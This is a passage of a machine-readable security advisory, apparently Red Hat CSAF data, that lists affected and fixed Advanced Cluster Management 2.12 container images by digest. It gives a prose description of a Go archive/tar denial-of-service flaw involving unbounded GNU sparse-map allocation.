"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
